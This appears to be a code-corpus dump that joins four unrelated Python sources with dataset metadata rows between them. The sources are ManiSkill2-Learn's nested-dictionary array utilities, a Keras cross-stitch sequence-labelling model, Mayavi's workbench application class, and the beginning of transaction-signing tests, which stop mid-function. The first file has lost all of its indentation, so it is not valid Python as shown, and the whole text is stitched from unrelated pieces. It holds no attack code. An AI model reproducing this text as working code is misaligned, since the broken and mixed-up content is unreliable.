ret = {key: cls.to_item(item[key]) for key in item}
return ret
elif isinstance(item, (list, tuple)):
return [cls.to_item(x) for x in item]
else:
return item
@classmethod
def check_item(cls, item):
if isinstance(item, dict):
for key in item:
if not cls.check_item(item[key]):
return False
elif isinstance(item, list):
for x in item:
if not cls.check_item(x):
return False
elif isinstance(item, (tuple, GDict)):
return False
return True
@classmethod
def assert_item(cls, item):
        assert cls.check_item(item), "Tuple and GDict must not appear in self.memory"
@classmethod
def _recursive_do_on_memory(cls, memory, function, new=True, ignore_list=False, *args, **kwargs):
"""Apply an operation to all elements in GDict. The operator can be functions in array_ops."""
if isinstance(memory, dict):
ret = {} if new else memory
for key, value in memory.items():
if cls._is_final(value):
ret[key] = function(value, *args, **kwargs)
else:
ret[key] = cls._recursive_do_on_memory(memory[key], function, new, ignore_list, *args, **kwargs)
return ret
elif isinstance(memory, list) and not ignore_list:
ret = [None for x in memory] if new else memory
for key, value in enumerate(memory):
if cls._is_final(value):
ret[key] = function(value, *args, **kwargs)
else:
ret[key] = cls._recursive_do_on_memory(memory[key], function, new, ignore_list, *args, **kwargs)
return ret
else:
return function(memory, *args, **kwargs)
@classmethod
def _recursive_do(cls, memory, function, new=True, wrapper=True, capacity=None, *args, **kwargs):
item = cls._recursive_do_on_memory(memory, function, new, *args, **kwargs)
return cls(item, capacity=capacity, faster=True) if wrapper else item
@classmethod
def _recursive_do_gdict(cls, memory, function, new=True, wrapper=True, *args, **kwargs):
item = cls._recursive_do_on_memory(memory, function, new, *args, **kwargs)
return GDict(item, faster=True) if wrapper else item
@classmethod
def _recursive_compare(cls, a, b, function):
if isinstance(a, dict):
inter_set = set(a.keys()) & set(b.keys())
for key in inter_set:
if not cls._recursive_compare(a[key], b[key], function):
return False
elif isinstance(a, list):
for i in range(min(len(a), len(b))):
if not cls._recursive_compare(a[i], b[i], function):
return False
else:
return function(a, b)
return True
@classmethod
def _get_item(cls, memory, keys):
if len(keys) == 0 or memory is None:
return memory
elif is_dict(memory):
key = keys[0]
return cls._get_item(memory.get(key, None), keys[1:])
elif is_list_of(memory):
key = eval(keys[0])
return cls._get_item(memory[key], keys[1:])
else:
            print(f"Error! Keys descend below a leaf of type {type(memory)}; remaining keys {keys}.")
@classmethod
def _set_item(cls, memory, keys, value):
if isinstance(memory, GDict):
memory = memory.memory
if len(keys) == 0:
return value
elif is_dict(memory):
key = keys[0]
memory[key] = cls._set_item(memory.get(key, None), keys[1:], value)
elif is_list_of(memory):
key = eval(keys[0])
if key > len(memory):
for i in range(key - len(memory) + 1):
memory.append(None)
memory[key] = cls._set_item(memory[key], keys[1:], value)
else:
            print(f"Error! Keys descend below a leaf of type {type(memory)}; remaining keys {keys}.")
return memory
@classmethod
def _update_memory(cls, target, other):
if is_list_of(target):
if len(other) > len(target):
for i in range(len(other) - len(target)):
target.append(None)
for i in range(len(other)):
target[i] = cls._update_memory(target[i], other[i])
elif is_dict(target):
for key in other:
target[key] = cls._update_memory(target.get(key, None), other[key])
else:
target = other
return target
def update(self, other):
if isinstance(other, GDict):
other = other.memory
self.memory = self._update_memory(self.memory, other)
def compatible(self, other):
if isinstance(other, GDict):
other = other.memory
def _compatible(a, b):
return type(a) == type(b)
return self._recursive_compare(self.memory, other, _compatible)
def shared_memory(self, other):
other = type(self)(other)
return self._recursive_compare(self.memory, other.memory, share_memory)
def copy(self, wrapper=True):
return self._recursive_do(self.memory, deepcopy, wrapper=wrapper)
def to_torch(self, use_copy=False, device="cpu", non_blocking=False, dtype=None, requires_grad=False, wrapper=True):
return self._recursive_do(
self.memory,
to_torch,
use_copy=use_copy,
device=device,
non_blocking=non_blocking,
dtype=dtype,
requires_grad=requires_grad,
wrapper=wrapper,
)
def to_array(self, wrapper=True):
return self._recursive_do(self.memory, to_array, wrapper=wrapper)
def to_numpy(self, use_copy=False, dtype=None, wrapper=True):
return self._recursive_do(self.memory, to_np, use_copy=use_copy, dtype=dtype, wrapper=wrapper)
def to_hdf5(self, file):
from maniskill2_learn.utils.file import dump_hdf5
dump_hdf5(self.memory, file)
@classmethod
def from_hdf5(cls, file, keys=None, wrapper=True):
from maniskill2_learn.utils.file import load_hdf5
ret = load_hdf5(file, keys)
if wrapper:
ret = cls(ret)
return ret
@property
def shape(self):
def get_shape(x):
shape = getattr(x, "shape", None)
if shape is not None and len(shape) == 1:
shape = shape[0]
return shape
return self._recursive_do_on_memory(self.memory, get_shape)
@property
def list_shape(self):
def get_shape(x):
shape = getattr(x, "shape", None)
if shape is not None and len(shape) == 1:
shape = shape[0]
else:
shape = list(shape) # For torch.Size
return shape
return self._recursive_do_on_memory(self.memory, get_shape)
@property
def type(self):
return self._recursive_do_on_memory(self.memory, type)
@property
def dtype(self):
return self._recursive_do_on_memory(self.memory, get_dtype)
@property
def nbytes(self):
return self._recursive_do_on_memory(self.memory, get_nbytes)
@property
def is_np(self):
return self._recursive_do_on_memory(self.memory, is_np)
@property
def is_np_all(self):
ret = self._flatten(self._recursive_do_on_memory(self.memory, is_np))
return np.alltrue([v for k, v in ret.items()]) if isinstance(ret, dict) else ret
@property
def nbytes_all(self):
ret = self._flatten(self._recursive_do_on_memory(self.memory, get_nbytes))
return sum([v for k, v in ret.items()]) if isinstance(ret, dict) else ret
@property
def is_big(self):
return self.nbytes_all / 1024 / 1024 > 1
@property
def device(self):
def get_device(x):
device = getattr(x, "device", None)
if device is not None:
device = f"{device.type}:{device.index}" if device.index is not None else f"{device.type}"
return device
return self._recursive_do_on_memory(self.memory, get_device)
def cpu(self, wrapper=True):
return self._recursive_do_gdict(self.memory, to_cpu, wrapper=wrapper)
def cuda(self, device="cuda", wrapper=True):
return self._recursive_do_gdict(self.memory, to_cuda, device=device, wrapper=wrapper)
def item(self, wrapper=True):
return self._recursive_do_gdict(self.memory, to_item, wrapper=wrapper)
def astype(self, dtype, wrapper=True):
return self._recursive_do(self.memory, as_dtype, dtype=dtype, wrapper=wrapper, capacity=self.capacity)
def float(self, wrapper=True):
return self.astype("float32", wrapper=wrapper)
def f64_to_f32(self, wrapper=True):
from .compression import f64_to_f32
return self._recursive_do(self.memory, f64_to_f32, wrapper=wrapper, capacity=self.capacity)
def squeeze(self, axis=None, wrapper=True):
return self._recursive_do(self.memory, squeeze, axis=axis, wrapper=wrapper)
def unsqueeze(self, axis, wrapper=True):
return self._recursive_do(self.memory, unsqueeze, axis=axis, wrapper=wrapper, capacity=self.capacity if axis != 0 else 1)
def detach(self, wrapper=True):
return self._recursive_do(self.memory, detach, wrapper=wrapper, capacity=self.capacity)
def to_zeros(self, wrapper=True):
return self._recursive_do(self.memory, zeros_like, wrapper=wrapper, capacity=self.capacity)
def repeat(self, rep, axis=None, wrapper=True):
return self._recursive_do(
self.memory, repeat, rep=rep, axis=axis, wrapper=wrapper, capacity=self.capacity if axis != 0 and axis is not None else None
)
def reshape(self, newshape, wrapper=True):
return self._recursive_do(self.memory, reshape, newshape=newshape, wrapper=wrapper, capacity=newshape)
def split_dim(self, axis, newaxes, wrapper=True):
assert isinstance(newaxes, (list, tuple))
return self._recursive_do(
self.memory, split_dim, axis=axis, newaxes=newaxes, wrapper=wrapper, capacity=self.capacity if axis != 0 else newaxes[0]
)
def transpose(self, axis0, axis1, contiguous=True, wrapper=True):
return self._recursive_do(
self.memory,
transpose,
axis0=axis0,
axis1=axis1,
contiguous=contiguous,
wrapper=wrapper,
capacity=self.capacity if 0 not in [axis0, axis1] else None,
)
def contiguous(self, wrapper=True):
return self._recursive_do(self.memory, contiguous, wrapper=wrapper, capacity=self.capacity)
def tile(self, rep, wrapper=True):
return self._recursive_do(self.memory, tile, rep=rep, wrapper=wrapper)
def mean(self, axis=None, keepdim=False, wrapper=True):
return self._recursive_do(
self.memory, arr_mean, axis=axis, keepdim=keepdim, wrapper=wrapper, capacity=self.capacity if axis != 0 and axis is not None else None
)
@classmethod
def _assign(cls, memory, indices, value, ignore_list=False):
if isinstance(value, tuple):
value = list(value)
if is_dict(memory):
assert type(memory) == type(value), f"{type(memory), type(value)}"
for key in memory:
if key in value:
memory[key] = cls._assign(memory[key], indices, value[key], ignore_list)
elif is_arr(memory):
assert type(memory) == type(value) or np.isscalar(value), f"{type(memory), type(value)}"
if share_memory(memory, value):
memory[indices] = deepcopy(value)
else:
memory[indices] = value
elif is_list_of(memory):
if ignore_list:
memory[indices] = value
else:
# if is_num(indices):
# memory[indices] = value if is_num(value) else value[indices]
# else:
# assert type(memory) == type(value), f"{type(memory), type(value)}"
for i in range(min(len(memory), len(value))):
memory[i] = cls._assign(memory[i], indices, value[i], ignore_list)
return memory
def assign_list(self, index, value):
if isinstance(value, GDict):
value = value.memory
assert is_num(index)
self.memory = self._assign(self.memory, index, value, True)
def to_two_dims(self, wrapper=True):
return self._recursive_do(self.memory, to_two_dims, wrapper=wrapper)
def take_list(self, index, wrapper=True):
assert is_num(index)
return self._recursive_do_gdict(self.memory, take, indices=index, axis=0, ignore_list=True, wrapper=wrapper)
def to_list(self, wrapper=True):
return self._recursive_do(self.memory, to_list, wrapper=wrapper)
def select_with_mask(self, mask, wrapper=True):
return self._recursive_do(self.memory, select_with_mask, mask=mask, wrapper=wrapper, capacity=to_item(mask.sum()))
def recover_with_mask(self, mask, wrapper=True):
        return self._recursive_do(self.memory, recover_with_mask, mask=mask, wrapper=wrapper, capacity=mask.shape[0])
def allreduce(self, op="MEAN", device="cuda", wrapper=True):
return self._recursive_do(self.memory, allreduce, op=op, device=device, wrapper=wrapper, capacity=self.capacity)
def to_gdict(self):
return GDict(self.memory, faster=True)
@property
def one_device(self):
return self._get_one_attr(self.memory, "device")
@property
def one_shape(self):
return self._get_one_attr(self.memory, "shape")
@property
def one_dtype(self):
return self._get_one_attr(self.memory, "dtype")
def _flatten(cls, memory, root_key="", full=True):
if is_dict(memory):
ret = {}
for key in memory:
ret.update(cls._flatten(memory[key], f"{root_key}/{key}", full))
elif is_list_of(memory) and (full or len(memory) > 10):
# Simplify flatten result for small list or tuple
ret = {}
for i in range(len(memory)):
ret.update(cls._flatten(memory[i], f"{root_key}/{i}", full))
else:
return memory if root_key == "" else {root_key.replace("//", "/"): memory}
return ret
def flatten(self, full=True):
return type(self)(self._flatten(self.memory, "", full))
@classmethod
def wrapper(cls, class_method=False):
if not class_method:
def decorator(func):
@wraps(func)
def wrapper(item, *args, **kwargs):
if isinstance(item, GDict):
return func(item, *args, **kwargs)
else:
return func(GDict(item), *args, **kwargs).memory
return wrapper
else:
def decorator(func):
@wraps(func)
def wrapper(self, item, *args, **kwargs):
if isinstance(item, GDict):
return func(self, item, *args, **kwargs)
else:
return func(self, GDict(item), *args, **kwargs).memory
return wrapper
return decorator
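    # A minimal sketch of using the decorator (the function name is hypothetical):
    #
    #   @GDict.wrapper()
    #   def to_float(item):                  # item always arrives wrapped as a GDict
    #       return item.astype("float32")    # must return a GDict
    #
    #   to_float({'obs': np.ones(3)})        # a plain dict goes in and comes back unwrapped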
def select_by_keys(self, keys=None, to_list=False, wrapper=True):
def _dfs_select(memory, keys=None):
if keys is None:
return memory
if isinstance(memory, dict):
new_keys = {}
for key in keys:
fk = key[0]
if len(key) > 1:
if fk not in new_keys:
new_keys[fk] = []
new_keys[fk].append(key[1:])
else:
new_keys[fk] = None
return {key: _dfs_select(memory[key], new_keys[key]) for key in new_keys}
elif isinstance(memory, list):
new_keys = {}
for key in keys:
fk = eval(key[0]) if is_str(key[0]) else key[0]
if len(key) > 1:
if fk not in new_keys:
new_keys[fk] = []
new_keys[fk].append(key[1:])
else:
new_keys[fk] = None
return [_dfs_select(memory[key], new_keys[key]) for key in sorted(new_keys)]
else:
raise ValueError(f"{keys}")
if not isinstance(keys, (list, tuple)) and keys is not None:
keys = [keys]
single = True
else:
single = False
keys = [self._process_key(key) for key in keys]
memory = _dfs_select(self.memory, keys)
if to_list:
memory = type(self)(memory)
memory = [memory[key] for key in keys]
if single:
memory = memory[0]
if wrapper:
memory = type(self)(memory)
return memory
def take(self, indices, axis=0, wrapper=True): # will always copy data, needs double check
if is_num(indices):
return self._recursive_do_gdict(self.memory, take, indices=indices, axis=axis, wrapper=wrapper)
else:
if isinstance(indices, slice):
len_indices = len(slice_to_range(indices))
else:
len_indices = len(indices)
new_capacity = len_indices if axis == 0 else self.capacity
return self._recursive_do(self.memory, take, indices=indices, axis=axis, wrapper=wrapper, capacity=new_capacity)
def slice(self, slice, axis=0, wrapper=True): # no copy
return self._recursive_do(self.memory, slice_item, slice=slice, axis=axis, wrapper=wrapper)
def assign_all(self, value):
if isinstance(value, GDict):
value = value.memory
self.memory = self._assign(self.memory, slice(None, None, None), value)
@classmethod
def _do_on_list_of_array(cls, memories, function, **kwargs):
for i in range(len(memories)):
assert type(memories[i]) is type(memories[0]), f"{type(memories[i]), type(memories[0])}"
if isinstance(memories[0], (tuple, list)):
for i in range(len(memories)):
assert len(memories[i]) == len(memories[0])
ret = []
for i in range(len(memories[0])):
ret.append(cls._do_on_list_of_array([memories[j][i] for j in range(len(memories))], function, **kwargs))
elif isinstance(memories[0], dict):
for i in range(len(memories)):
assert set(memories[i].keys()) == set(memories[0].keys()), f"{set(memories[i].keys())}, {set(memories[0].keys())}"
ret = {}
for key in memories[0]:
ret[key] = cls._do_on_list_of_array([memories[j][key] for j in range(len(memories))], function, **kwargs)
else:
ret = function(memories, **kwargs)
return ret
@classmethod
def concat(cls, items, axis=0, wrapper=True):
ret = cls._do_on_list_of_array([_.memory if isinstance(_, GDict) else _ for _ in items], concat, axis=axis)
if wrapper:
capacity = 0
for item in items:
if isinstance(item, GDict) and item.capacity is not None:
capacity += item.capacity
else:
capacity = None
break
return cls(ret, capacity=capacity, faster=True)
else:
return ret
@classmethod
def stack(cls, items, axis=0, wrapper=True):
ret = cls._do_on_list_of_array([_.memory if isinstance(_, GDict) else _ for _ in items], stack, axis=axis)
if wrapper:
if axis == 0:
capacity = len(items)
else:
capacity = None
for item in items:
if isinstance(item, cls) and item.capacity is not None:
capacity = item.capacity
break
return cls(ret, capacity=capacity, faster=True)
else:
return ret
@classmethod
def _process_key(cls, key):
if is_num(key):
key = str(key)
return key if isinstance(key, (list, tuple)) else key.strip("/").replace("//", "/").split("/")
def __getitem__(self, key):
return self._get_item(self.memory, self._process_key(key))
def __setitem__(self, key, value):
self.memory = self._set_item(self.memory, self._process_key(key), value)
return self.memory
def __str__(self):
return str(self._flatten(self.memory, "", False))
def __dict__(self):
assert isinstance(self.memory, dict), "self.memory is not a dict!"
return self.memory
def __getattr__(self, key):
return getattr(self.memory, key)
def __contains__(self, key):
if "/" in key:
key = self._process_key(key)
memory = self.memory
for _ in key:
if _ not in memory:
return False
memory = memory[_]
return True
else:
return key in self.memory
def __delitem__(self, key):
keys = list(self._process_key(key))
last_memory = None
memory = self.memory
for i, key in enumerate(keys):
if isinstance(last_memory, list) and isinstance(key, str):
key = eval(key)
keys[i] = key
last_memory = memory
memory = memory[key]
if last_memory is None:
self.memory = None
elif isinstance(last_memory, (dict, list)):
last_memory.pop(key)
class DictArray(GDict):
"""
    DictArray is a special GDict which requires the first dimension of every GDict-Final element to be the same
"""
def __init__(self, item=None, capacity=None, faster=False):
super(DictArray, self).__init__(item, faster=faster)
if item is None:
self.capacity = None
return
if capacity is not None:
self.capacity = capacity
if not faster:
self.memory = self.to_array(wrapper=False)
self.memory = self.unsqueeze(axis=0, wrapper=False) #.to_zeros(wrapper=False)
if capacity != 1:
self.memory = self.repeat(capacity, axis=0, wrapper=False)
elif self.capacity is None:
self.capacity = self._get_one_attr(self.memory, "shape")[0]
if not faster:
self.assert_shape(self.memory, self.capacity)
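    # A minimal construction sketch (shapes are illustrative):
    #
    #   buf = DictArray({'obs': np.zeros(3), 'rew': np.zeros(1)}, capacity=8)
    #   buf.shape   # {'obs': (8, 3), 'rew': (8, 1)} -- every leaf gets leading dimension 8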
@classmethod
def _get_one_attr(cls, memory, attr):
# print(type(memory), attr)
if isinstance(memory, dict):
for key in memory:
if hasattr(memory[key], attr):
return getattr(memory[key], attr)
ans = cls._get_one_attr(memory[key], attr)
if ans is not None:
return ans
elif isinstance(memory, list):
for x in memory:
if hasattr(x, attr):
return getattr(x, attr)
ans = cls._get_one_attr(x, attr)
if ans is not None:
return ans
elif hasattr(memory, attr):
return getattr(memory, attr)
return None
@classmethod
def check_shape(cls, memory, capacity):
if isinstance(memory, dict):
for key in memory:
if not cls.check_shape(memory[key], capacity):
return False
elif isinstance(memory, list):
for x in memory:
if not cls.check_shape(x, capacity):
return False
elif hasattr(memory, "shape"):
return memory.shape[0] == capacity
return True
@classmethod
def assert_shape(cls, memory, capacity):
assert cls.check_shape(memory, capacity), f"The first dimension is not {capacity}!"
def sample(self, batch_size, valid_capacity=None, wrapper=True):
capacity = self.capacity if valid_capacity is None else valid_capacity
indices = np.random.randint(low=0, high=capacity, size=batch_size)
return self._recursive_do(self.memory, take, indices=indices, axis=0, wrapper=wrapper, capacity=batch_size)
def shuffle(self, valid_capacity=None, wrapper=True, in_place=True):
capacity = self.capacity if valid_capacity is None else valid_capacity
indices = shuffle(np.arange(capacity), axis=0)
# print(valid_capacity, self.capacity)
# print(np.unique(indices).shape, len(indices))
# exit(0)
# print(capacity, self.capacity)
if in_place:
# print(indices)
items = self.take(slice(0, capacity), wrapper=False)
# print(items.shape, share_memory(items['actions'], self.memory['actions']))
self.assign(indices, items)
# self._recursive_do(self.memory, take, indices=indices, axis=0, wrapper=False, capacity=self.capacity)
else:
if capacity < self.capacity:
indices = np.concatenate([indices, np.arange(self.capacity - capacity) + capacity], axis=0)
return self._recursive_do(self.memory, take, indices=indices, axis=0, wrapper=wrapper, capacity=self.capacity)
def assign(self, indices, value):
if isinstance(value, GDict):
value = value.memory
self.memory = self._assign(self.memory, indices, value)
def gather(self, axis, index, wrapper=True):
return self._recursive_do(self.memory, gather, axis=axis, index=index, wrapper=wrapper)
def to_dict_array(self):
return DictArray(self.memory, capacity=self.capacity, faster=True)
def __len__(self):
return self.capacity
class SharedGDict(GDict):
def __init__(self, gdict=None, shape=None, dtype=None, name=None):
if gdict is not None:
assert shape is None and dtype is None and name is None
assert isinstance(gdict, GDict) and gdict.is_np_all
shape = gdict.shape
dtype = gdict.dtype
nbytes = gdict.nbytes
else:
assert not (shape is None or dtype is None or name is None)
nbytes = None
self.is_new = name is None
name, self.shared_memory = self._create_shared_memory(shape, dtype, nbytes, name)
memory = self._create_np_from_memory(self.shared_memory, shape, dtype)
self.shared_shape = shape
self.shared_dtype = dtype
self.shared_name = name
super(SharedGDict, self).__init__(memory)
def _create_np_from_memory(cls, shared_memory, shape, dtype):
if isinstance(shared_memory, dict):
memory = {k: cls._create_np_from_memory(shared_memory[k], shape[k], dtype[k]) for k in shared_memory}
elif isinstance(shared_memory, list):
memory = [cls._create_np_from_memory(shared_memory[k], shape[k], dtype[k]) for k in range(len(shared_memory))]
else:
if isinstance(dtype, str):
dtype = np.dtype(dtype)
memory = np.ndarray(shape, dtype=dtype, buffer=shared_memory.buf)
return memory
def _create_shared_memory(cls, shape, dtype, nbytes, name=None):
if name is None:
# Create new shared buffer
if isinstance(nbytes, dict):
ret_name, ret_memory = {}, {}
for key in nbytes:
name_k, memory_k = cls._create_shared_memory(shape[key], dtype[key], nbytes[key], None)
ret_name[key] = name_k
ret_memory[key] = memory_k
elif isinstance(nbytes, (list, tuple)):
ret_name, ret_memory = [], []
for key in range(len(nbytes)):
name_k, memory_k = cls._create_shared_memory(shape[key], dtype[key], nbytes[key], None)
ret_name.append(name_k)
ret_memory.append(memory_k)
else:
assert is_num(nbytes), f"{nbytes}"
ret_memory = SharedMemory(size=nbytes, create=True)
ret_name = ret_memory.name
else:
ret_name = name
if isinstance(name, dict):
ret_memory = {k: cls._create_shared_memory(shape[k], dtype[k], None, name[k])[1] for k in name}
elif isinstance(name, (list, tuple)):
ret_memory = [cls._create_shared_memory(shape[k], dtype[k], None, name[k])[1] for k in range(len(name))]
else:
assert isinstance(name, str), f"{name}"
ret_memory = SharedMemory(name=name, create=False)
return ret_name, ret_memory
def get_infos(self):
return self.shared_shape, self.shared_dtype, self.shared_name
def _unlink(self):
memory = self._flatten(self.shared_memory)
if isinstance(memory, dict):
for k, v in memory.items():
v.unlink()
else:
memory.unlink()
def _close(self):
memory = self._flatten(self.shared_memory)
if isinstance(memory, dict):
for k, v in memory.items():
v.close()
elif not callable(memory):
memory.close()
def __del__(self):
self._close()
if self.is_new:
self._unlink()
def get_full_by_key(self, key):
ret = []
for name in ["shared_shape", "shared_dtype", "shared_name"]:
ret.append(self._get_item(getattr(self, name), self._process_key(key)))
return type(self)(None, *ret)
def __setitem__(self, key, value):
        assert False, "Please convert to GDict or DictArray before changing the value!"
class SharedDictArray(SharedGDict, DictArray):
pass
|
haosulab/ManiSkill2-Learn
|
maniskill2_learn/utils/data/dict_array.py
|
dict_array.py
|
py
| 34,803 |
python
|
en
|
code
| 53 |
github-code
|
6
|
28900653981
|
from keras.models import *
from keras.layers import *
import keras
from dlblocks.keras_utils import allow_growth , showKerasModel
allow_growth()
from dlblocks.pyutils import env_arg
import tensorflow as tf
from Utils import Trainer
from SluiceUtils import *
class Sluice_SeqLab(Trainer):
def build_model(self):
config = self.config
embed = Embedding( self.config['vocab_size'] , self.config['embed_dim'] , mask_zero=True)
rnn_hi = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_en = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_enhi = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_hi2 = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_en2 = (LSTM( self.config['nHidden'] , return_sequences=True ))
rnn_enhi2 = (LSTM( self.config['nHidden'] , return_sequences=True ))
stitch_layer = CrossStitch()
stitch_layer.supports_masking = True
osel = OutPutSelector()
osel.supports_masking = True
def desectOut(xx):
l = xx.shape[-1]
        return Lambda(lambda x: [x[..., :l // 2], x[..., l // 2:]])(xx)  # integer division so the split index stays an int
def cal_cs( inp ):
x = embed(inp)
x_hi = rnn_hi( x )
# en
x = embed(inp)
x_en = rnn_en( x )
x = embed(inp)
x_enhi = rnn_enhi( x )
[ x_hi1 , x_hi2 ] = desectOut( x_hi )
[ x_en1 , x_en2 ] = desectOut( x_en )
[ x_enhi1 , x_enhi2 ] = desectOut( x_enhi )
[ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ] = stitch_layer([ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ])
x_hi = Concatenate()([ x_hi1 , x_hi2 ])
x_en = Concatenate()([ x_en1 , x_en2 ])
x_enhi = Concatenate()([ x_enhi1 , x_enhi2 ])
x_hi_p = x_hi
x_en_p = x_en
x_enhi_p = x_enhi
x_hi = rnn_hi2( x_hi )
x_en = rnn_en2( x_en )
x_enhi = rnn_enhi2( x_enhi )
[ x_hi1 , x_hi2 ] = desectOut( x_hi )
[ x_en1 , x_en2 ] = desectOut( x_en )
[ x_enhi1 , x_enhi2 ] = desectOut( x_enhi )
[ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ] = stitch_layer([ x_hi1 , x_en1 , x_enhi1 , x_hi2 , x_en2 , x_enhi2 ])
x_hi = Concatenate()([ x_hi1 , x_hi2 ])
x_en = Concatenate()([ x_en1 , x_en2 ])
x_enhi = Concatenate()([ x_enhi1 , x_enhi2 ])
x_hi = osel([ x_hi , x_hi_p ])
x_en = osel([ x_en , x_en_p ])
x_enhi = osel([ x_enhi , x_enhi_p ])
return [ x_hi , x_en, x_enhi ]
# hi
inp_hi = Input((self.config['sent_len'] , ))
# en
inp_en = Input((self.config['sent_len'] , ))
inp_enhi = Input((self.config['sent_len'] , ))
[ x_hi , _ , _ ] = cal_cs( inp_hi)
[ _ , x_en , _ ] = cal_cs( inp_en)
[ _ , _ , x_enhi ] = cal_cs( inp_enhi)
out_enhi = TimeDistributed(Dense( self.config['n_class_enhi'] , activation='softmax'))(x_enhi)
out_hi = TimeDistributed(Dense( config['n_class_hi'] , activation='softmax'))(x_hi)
out_en = TimeDistributed(Dense( config['n_class_en'] , activation='softmax'))(x_en)
self.model = Model( [inp_hi , inp_en , inp_enhi ] , [ out_hi , out_en , out_enhi ] )
Trainer.build_model( self )
# jjj
"""
config = {}
config['epochs'] = 4
config['dataset'] = "/tmp/postag_prepped.h5"
config['exp_name'] = 'pos_girnet_1l'
config['embed_dim'] = 50
config['vocab_size'] = 30003
config['nHidden'] = 100
config['sent_len'] = 150
config['n_class_en'] = 45
config['n_class_hi'] = 25
config['n_class_enhi'] = 19
model = Sluice_SeqLab( exp_location="./ttt" , config_args = config )
model.train()
"""
|
divamgupta/mtl_girnet
|
sequence_labeling/sluice.py
|
sluice.py
|
py
| 4,038 |
python
|
en
|
code
| 6 |
github-code
|
6
|
30353923791
|
from os.path import dirname
import logging
# Enthought library imports.
from traits.api import Bool
from envisage.ui.workbench.api import WorkbenchApplication
from pyface.api import AboutDialog, ImageResource, SplashScreen
# Local imports.
import mayavi.api
from mayavi.preferences.api import preference_manager
IMG_DIR = dirname(mayavi.api.__file__)
logger = logging.getLogger(__name__)
class MayaviWorkbenchApplication(WorkbenchApplication):
""" The mayavi application. """
#### MayaviWorkbenchApplication interface #################################
# Turn this off if you don't want the workbench to start a GUI
# event loop.
start_gui_event_loop = Bool(True, desc='start a GUI event loop')
#### 'IApplication' interface #############################################
# The application's globally unique Id.
id = 'mayavi_e3'
#### 'WorkbenchApplication' interface #####################################
# Branding information.
#
# The icon used on window title bars etc.
icon = ImageResource('m2.ico', search_path=[IMG_DIR])
# The name of the application (also used on window title bars etc).
name = 'Mayavi2 - The 3D data visualizer'
###########################################################################
# 'WorkbenchApplication' interface.
###########################################################################
def run(self):
""" Run the application.
This does the following:
1) Starts the application
2) Creates and opens a workbench window
3) Starts the GUI event loop (only if start_gui_event_loop is
True)
4) When the event loop terminates, stops the application
This particular method is overridden from the parent class to
allow the user to not run the gui event loop as would be
        necessary when the loop is started elsewhere or when run from
IPython.
"""
logger.debug('---------- workbench application ----------')
# Make sure the GUI has been created (so that, if required, the splash
# screen is shown).
gui = self.gui
# Start the application.
if self.start():
# Create and open the first workbench window.
window = self.workbench.create_window(
position=self.window_position, size=self.window_size
)
window.open()
# We stop the application when the workbench has exited.
self.workbench.on_trait_change(self._on_workbench_exited, 'exited')
# Start the GUI event loop if needed.
if self.start_gui_event_loop:
# THIS CALL DOES NOT RETURN UNTIL THE GUI IS CLOSED.
gui.start_event_loop()
return
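    # A hedged sketch of the use case described in the docstring (assumes the
    # application is otherwise configured with its usual plugins):
    #
    #   app = MayaviWorkbenchApplication(start_gui_event_loop=False, ...)
    #   app.run()   # returns without blocking; the host (e.g. IPython) drives the event loop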
######################################################################
# Non-public interface.
######################################################################
def _about_dialog_default(self):
""" Trait initializer. """
from mayavi import api
from vtk import vtkVersion
vtk_version = vtkVersion().GetVTKVersion()
about_dialog = AboutDialog(
parent = self.workbench.active_window.control,
image = ImageResource('m2_about.jpg',
search_path=[IMG_DIR]),
additions = ['Authors: Prabhu Ramachandran',
'and Gael Varoquaux',
'',
'Mayavi version %s \t - \t VTK version %s' %
(api.__version__, vtk_version)],
)
return about_dialog
def _splash_screen_default(self):
""" Trait initializer. """
if preference_manager.root.show_splash_screen:
splash_screen = SplashScreen(
image = ImageResource('m2_about.jpg',
search_path=[IMG_DIR]),
show_log_messages = True,
)
else:
splash_screen = None
return splash_screen
|
enthought/mayavi
|
mayavi/plugins/mayavi_workbench_application.py
|
mayavi_workbench_application.py
|
py
| 4,140 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|
23944471661
|
import json
import pytest
from deepdiff import DeepDiff
from eth_keys.datatypes import PrivateKey
from hexbytes import HexBytes
from jsonschema import ValidationError
from web3 import Web3
from polyswarmtransaction.exceptions import InvalidKeyError, InvalidSignatureError, WrongSignatureError, \
UnsupportedTransactionError
from polyswarmtransaction.transaction import Transaction, SignedTransaction, CustomTransaction
def test_recover_when_computed(ethereum_accounts):
# Must be a string exact match
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
signed = Transaction().sign(ethereum_accounts[0].key)
assert signed.signature == PrivateKey(ethereum_accounts[0].key).sign_msg_hash(Web3.keccak(text=json.dumps(data)))
def test_sign_transaction(ethereum_accounts):
expected = '0xed2e8602439eec57a84bb372c6de718d88d2c27f265d7c01fe59a940f9c44eb25f849639669897e376dca6b3e745f4d9667' \
'32f731b6ec20d908673ad882aeed301'
data = {
'name': 'polyswarmtransaction.transaction:Transaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': {}
}
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
assert json.loads(signed.raw_transaction) == data
assert signed.signature.hex() == expected
def test_sign_customtransaction_data_body(ethereum_accounts):
expected = '0xbd112f273df4e3a7d1b97525513c41f42e737c513bad190d74eb92947869747415a857110b02a17cc37f1a0e80514efd94c' \
'e807196a90cbc88a09377faf202e200'
custom_data = {'spam': 'eggs', 'pi': 3, 'it_moves': True}
data = {
'name': 'polyswarmtransaction.transaction:CustomTransaction',
'from': '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5',
'data': custom_data,
}
transaction = CustomTransaction(data_body=json.dumps(custom_data))
signed = transaction.sign(ethereum_accounts[0].key)
assert json.loads(signed.raw_transaction) == data
assert signed.signature.hex() == expected
assert isinstance(signed.transaction(), CustomTransaction)
def test_recover_signed_transaction(ethereum_accounts):
transaction = Transaction()
signed = transaction.sign(ethereum_accounts[0].key)
assert signed.ecrecover() == '0x3f17f1962B36e491b30A40b2405849e597Ba5FB5'
def test_recover_signed_transaction_from_parts():
